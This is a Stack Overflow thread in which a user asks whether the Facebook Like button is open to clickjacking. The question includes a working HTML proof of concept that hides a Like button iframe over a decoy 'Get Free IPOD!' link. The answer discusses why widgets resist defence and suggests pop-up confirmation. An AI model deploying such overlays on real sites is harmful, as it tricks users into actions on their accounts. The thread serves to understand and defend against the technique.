
javascript - Does facebook like button vulnerable to clickjacking? - Stack Overflow


A few days ago I read about the clickjacking attack at http://javascript.info/tutorial/clickjacking . So today I tried it with the Facebook Like button, and it seems that I was successful in the experiment.

But I am not sure whether I am correct or not. This is the code snippet I have used.

<html>
<head>
    <script>
      /* Standard Facebook JS SDK bootstrap; the appId is masked in the question. */
      window.fbAsyncInit = function() {
        FB.init({
          appId      : '********',
          xfbml      : true,
          version    : 'v2.1'
        });
      };

      (function(d, s, id){
         var js, fjs = d.getElementsByTagName(s)[0];
         if (d.getElementById(id)) {return;}
         js = d.createElement(s); js.id = id;
         js.src = "//connect.facebook.net/en_US/sdk.js";
         fjs.parentNode.insertBefore(js, fjs);
       }(document, 'script', 'facebook-jssdk'));
    </script>
    <style>
        iframe { /* iframe from facebook, absolutely positioned over the decoy link */
          width:140px;
          height:100px;
          margin-top: 100px;
          margin-left: 50px;
          position:absolute;
          top:0; left:0;
          filter:alpha(opacity=50); /* legacy IE syntax; in real life opacity=0 */
          opacity:0.5;              /* kept half-visible here so the overlay can be seen */
        }
        .a{ /* the decoy link the user believes they are clicking */
            margin-top: 95px;
        }
    </style>
</head>
<body>
    <div class="a">
        <a  href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">Get Free IPOD!</a>
    </div>
    <!-- The Like button iframe sits on top of the decoy link and receives the click. -->
    <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2FTimesnow&amp;width&amp;layout=button&amp;action=like&amp;show_faces=false&amp;share=false&amp;height=35&amp;appId=*****" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:35px;" allowTransparency="true"></iframe>
</body>
</html>

I can set the opacity of the iframe to 0 so that the user cannot see the FB Like button; when the user clicks on the link, the attacker's page will be automatically liked.

Example Fiddle: http://jsfiddle/5e5kvxk4/2/

Am I missing something? Or is the Facebook Like button really vulnerable?

asked Sep 24, 2014 at 13:59 by user3427540; edited Sep 24, 2014 at 14:41
  • Yep it is. That's why I install a plugin on my browser that prevents Facebook buttons from working offsite. Anyways, what's your question? – Dave Chen Commented Sep 24, 2014 at 14:33
  • Well, how could this be prevented without disallowing any embedded buttons? – Bergi Commented Sep 24, 2014 at 14:35
  • @DaveChen: I am surprised that Facebook is vulnerable. That's what I was asking: does Facebook not take any prevention measures for this? – user3427540 Commented Sep 24, 2014 at 14:39
  • It does violate their policies, but I can see how it would be difficult to prevent. Note that like buttons should work offsite, so detecting if they are obstructed in view would be impossible for facebook to do. – Dave Chen Commented Sep 24, 2014 at 14:50
  • This issue is not specific to the FB like button in any way. And rest assured that Facebook is taking all measures against this that they possibly can – but in this situation, there is not much that can be done without breaking the intended functionality. (The counter-measures the page you linked to simply don’t apply here – the Like button is inside an iframe on purpose, so any kind of “frame breaking” would not make any sense whatsoever here in the first place.) – C3roe Commented Sep 25, 2014 at 12:05

1 Answer (score 6)

Yes, it probably is vulnerable to clickjacking. There isn't a good solution to protect widgets from forged requests using current web technologies.

The widget will either be vulnerable to clickjacking or CSRF as explained here:

From "How to protect widgets from forged requests":

You don't want this [widget] to be vulnerable to CSRF, so you write an iframe to the page. Based on the origin inheritance rules the parent site won't be able to read the CSRF token. However, what about clickjacking (or likejacking)? Because of CSRF you must be within an iframe, and therefore X-Frame-Options cannot help, and the same holds true for frame-busters.

The best solution at present appears to be employing a pop up window in order to validate the click:

Clicking on the widget needs to open a pop-up window containing a new page -- an iframe is not good enough, it must be a new window -- which is entirely under the control of your web application. Confirm the action, whatever it is, on that page.

Yes, this is somewhat inelegant, but the present Web security architecture doesn't give you any better options.
